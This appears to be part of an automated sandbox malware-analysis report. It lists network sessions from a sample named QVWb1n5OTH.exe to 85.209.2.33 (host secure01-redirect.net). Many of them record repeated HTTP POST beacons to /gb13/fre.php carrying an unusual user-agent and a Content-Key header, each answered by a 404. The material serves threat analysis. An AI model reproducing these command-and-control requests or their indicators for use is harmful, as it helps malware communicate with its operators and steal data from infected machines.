                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            258192.168.11.205008285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            259192.168.11.205008385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            26192.168.11.204984385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:23.553706884 CET365OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:24.381211996 CET366INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:23 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            260192.168.11.205008485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            261192.168.11.205008585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            262192.168.11.205008685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            263192.168.11.205008785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            264192.168.11.205008885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            265192.168.11.205008985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            266192.168.11.205009085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            267192.168.11.205009185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            268192.168.11.205009285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            269192.168.11.205009385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            27192.168.11.204984485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:24.818898916 CET366OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:25.592125893 CET367INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:25 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            270192.168.11.205009485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            271192.168.11.205009585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            272192.168.11.205009685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            273192.168.11.205009785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            274192.168.11.205009885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            275192.168.11.205009985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            276192.168.11.205010085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            277192.168.11.205010185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            278192.168.11.205010285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            279192.168.11.205010385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            28192.168.11.204984585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:26.028347015 CET368OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:26.906256914 CET375INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:26 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            280192.168.11.205010485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            281192.168.11.205010585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            282192.168.11.205010685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            283192.168.11.205010785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            284192.168.11.205010885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            285192.168.11.205010985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            286192.168.11.205011085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            287192.168.11.205011185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            288192.168.11.205011285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            289192.168.11.205011385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            29192.168.11.204984785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:27.337827921 CET375OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:28.232060909 CET376INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:27 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            290192.168.11.205011485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            291192.168.11.205011585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            292192.168.11.205011685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            293192.168.11.205011785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            294192.168.11.205011885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            295192.168.11.205011985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            296192.168.11.205012085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            297192.168.11.205012185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            298192.168.11.205012285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            299192.168.11.205012385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.11.204981785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:47.690591097 CET201OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:48.639542103 CET208INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:47 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            30192.168.11.204984885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:28.688637018 CET377OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:29.570425987 CET377INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:28 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            300192.168.11.205012485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            301192.168.11.205012585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            302192.168.11.205012685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            303192.168.11.205012785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            304192.168.11.205012885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            305192.168.11.205012985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            306192.168.11.205013085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            307192.168.11.205013185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            308192.168.11.205013285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            31192.168.11.204984985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:30.014599085 CET378OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:30.940841913 CET379INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:30 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            32192.168.11.204985085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:31.399327040 CET379OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:32.229130983 CET380INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:31 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            33192.168.11.204985185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:32.664177895 CET380OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:33.564311981 CET381INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:32 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            34192.168.11.204985285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:33.975949049 CET382OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:34.863339901 CET382INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:34 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            35192.168.11.204985385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:35.294981003 CET383OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:36.189126968 CET384INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:35 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            36192.168.11.204985485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:36.559737921 CET384OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:37.474410057 CET385INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:36 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            37192.168.11.204985585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:37.920795918 CET385OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:38.819508076 CET386INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:38 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            38192.168.11.204985685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:39.235162973 CET387OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:40.120188951 CET387INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:39 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            39192.168.11.204985785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:40.564452887 CET388OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:41.365394115 CET388INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:40 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.11.204981985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:49.302288055 CET208OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:50.210336924 CET209INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:49 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            40192.168.11.204985885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:41.789554119 CET389OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:43.031589985 CET390INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:42 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            41192.168.11.204985985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:43.474513054 CET390OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:44.328016996 CET391INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:43 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            42192.168.11.204986085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:44.740221024 CET392OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
